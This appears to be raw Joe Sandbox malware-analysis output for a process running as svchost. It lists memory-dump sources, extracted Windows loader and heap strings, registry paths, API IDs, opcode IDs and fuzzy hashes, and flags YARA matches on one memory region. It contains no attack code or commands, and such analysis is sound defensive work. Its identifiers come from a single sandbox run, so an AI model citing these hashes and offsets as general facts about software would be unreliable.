                                                                    • HEAP: , xrefs: 0368F8B7
                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0368F8CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$]:$`
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$&$@
                                                                    • API String ID: 0-1537733988
                                                                    Strings
                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0370B82A
                                                                    • GlobalizationUserSettings, xrefs: 0370B834
                                                                    • TargetNtPath, xrefs: 0370B82F
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                    • API String ID: 0-505981995
                                                                    Strings
                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0368E6C6
                                                                    • HEAP[%wZ]: , xrefs: 0368E6A6
                                                                    • HEAP: , xrefs: 0368E6B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                    • API String ID: 0-1340214556
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 036DDC12
                                                                    • HEAP: , xrefs: 036DDC1F
                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 036DDC32
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                    • API String ID: 0-3815128232
                                                                    Strings
                                                                    • Failed to reallocate the system dirs string !, xrefs: 036A82D7
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 036A82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 036A82DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    Strings
                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 036A1B39
                                                                    • LdrpAllocateTls, xrefs: 036A1B40
                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 036A1B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                    • API String ID: 0-4274184382
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036EC1C5
                                                                    • @, xrefs: 036EC1F1
                                                                    • PreferredUILanguages, xrefs: 036EC212
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    Strings
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036B4888
                                                                    • LdrpCheckRedirection, xrefs: 036B488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 036B4899
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    Strings
                                                                    • SXS: %s() passed the empty activation context data, xrefs: 036A29FE
                                                                    • Actx , xrefs: 036633AC
                                                                    • RtlCreateActivationContext, xrefs: 036A29F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                    • API String ID: 0-859632880
                                                                    Strings
                                                                    • LdrpInitializeTls, xrefs: 036A1A47
                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 036A1A51
                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 036A1A40
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                    • API String ID: 0-931879808
                                                                    Strings
                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0367127B
                                                                    • BuildLabEx, xrefs: 0367130F
                                                                    • @, xrefs: 036712A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 0-3051831665
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 036B2104
                                                                    • LdrpInitializationFailure, xrefs: 036B20FA
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 036B20F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID: kLsE
                                                                    • API String ID: 3446177414-3058123920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@
                                                                    • API String ID: 0-149943524
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @4rw@4rw$PATH
                                                                    • API String ID: 0-2366389529
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    Strings
                                                                    • ResIdCount less than 2., xrefs: 0368EEC9
                                                                    • Failed to retrieve service checksum., xrefs: 0368EE56
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                    • API String ID: 0-863616075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gfff$yxxx
                                                                    • API String ID: 0-1072206253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$
                                                                    • API String ID: 0-233714265
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0363A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0363A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local\$@
                                                                    • API String ID: 0-380025441
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P``wRb`w
                                                                    • API String ID: 0-2038367376
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3882697584
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3882697584
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 04rw04rwIrwIrw@4rw@4rw
                                                                    • API String ID: 0-2844649184
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PreferredUILanguages
                                                                    • API String ID: 0-1884656846
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: verifier.dll
                                                                    • API String ID: 0-3265496382
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Flst
                                                                    • API String ID: 0-2374792617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L4rwL4rw
                                                                    • API String ID: 0-1810648253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Instruction ID: 81a68c6de8afb1d907fbccfbe3fa0bd8278a453d77ebdbbaf4a87c306e508e1d
                                                                    • Opcode Fuzzy Hash: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                                                    • Instruction Fuzzy Hash: 23C19371E002159FEF25CF5AC940BAEFBB9EF55314F18826AD915AB390D770E942CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                    • Instruction ID: 419b0005f14b0e3bf6aa7146815f086bd5a135973496a7311b4c7590387125fa
                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                    • Instruction Fuzzy Hash: 3BB11875A00655AFDF26DB68CA50BBEFBFAEF84200F190199D642DB381DB30D942CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                                    • Instruction ID: 4faea40c2820b22c5fcc7fac65593395a82cbd17494c5d58d54f318269d9e4d0
                                                                    • Opcode Fuzzy Hash: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                                    • Instruction Fuzzy Hash: B4A13B75900215AFEF12EFA4CC95BAE77B9EF46750F054068FA00AF2A0D7759C10CBA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                                    • Instruction ID: bdaff764204ba1014785d391d8eb2df08658de79e0794ff7b24941d0a5606772
                                                                    • Opcode Fuzzy Hash: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                                    • Instruction Fuzzy Hash: 09C15874108341CFDB64CF15C584BAAB7E8FF89304F54496EE9898B391D774E909CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                                    • Instruction ID: 2df9a3e8f7594e1d586e11595edcfc901b3f24a430b61e9a3bbf7f02362f5867
                                                                    • Opcode Fuzzy Hash: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                                    • Instruction Fuzzy Hash: 28A1C275B0071ADBDB24DF69CA90BAAB7F5FF44314F544129EA059B381DB34E812CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                                                    • Instruction ID: e879bded4ebd538b1e04037936284470d3c8512bd5666b691589c0908e484ab7
                                                                    • Opcode Fuzzy Hash: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
